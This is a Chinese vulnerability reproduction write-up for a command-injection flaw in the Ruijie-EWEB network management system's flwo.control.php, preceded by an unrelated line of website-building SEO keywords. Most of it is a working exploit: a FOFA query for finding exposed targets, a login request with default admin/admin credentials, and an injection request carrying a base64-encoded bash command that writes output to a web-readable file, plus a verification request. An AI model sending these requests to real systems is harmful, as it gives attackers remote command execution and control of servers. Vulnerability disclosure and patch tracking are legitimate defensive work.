网站建设教程微云网盘,长春建站软件,wordpress 安装中文,传统企业如果建立网站0x01 产品简介 锐捷网管系统是由北京锐捷数据时代科技有限公司开发的新一代基于云的网络管理软件#xff0c;以“数据时代创新网管与信息安全”为口号#xff0c;定位于终端安全、IT运营及企业服务化管理统一解决方案。
0x02 漏洞概述 Ruijie-EWEB 网管系统 flwo.control.ph…0x01 产品简介 锐捷网管系统是由北京锐捷数据时代科技有限公司开发的新一代基于云的网络管理软件以“数据时代创新网管与信息安全”为口号定位于终端安全、IT运营及企业服务化管理统一解决方案。
0x02 漏洞概述 Ruijie-EWEB 网管系统 flwo.control.php 中的 type 参数存在命令执行漏洞攻击者可利用该漏洞执行任意命令写入后门获取服务器权限进而控制整个web服务器。
0x03 复现环境
FOFAappRuijie-EWEB网管系统 0x04 漏洞复现
获取admin用户有效cookie
POST /ddi/server/login.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: closeusernameadminpasswordadmin? 携带cookie执行命令并将结果写进txt文件 命令需要base64编码
POST /flow_control_pi/flwo.control.php?agetFlowGroup HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 210
Content-Type: application/x-www-form-urlencoded
Cookie: your-cookie useradmin;
Accept-Encoding: gzip
Connection: closetype%7Cbash-c%27echocm0gLXJmIC4uL2EudHh0ICYmIHJtIC1yZiAuLi9hLnR4dCAmJiB3aG9hbWkgPiAuLi9hLnR4dCAyPiYxID4gLi4vYS50eHQgMj4mMQ%3D%3D%7Cbase64-d%7Cbash%26%26exit0%27 验证
GET /a.txt HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close 0x05 修复建议 请及时关注厂商官网并更新最新系统https://www.ruijie.com.cn/
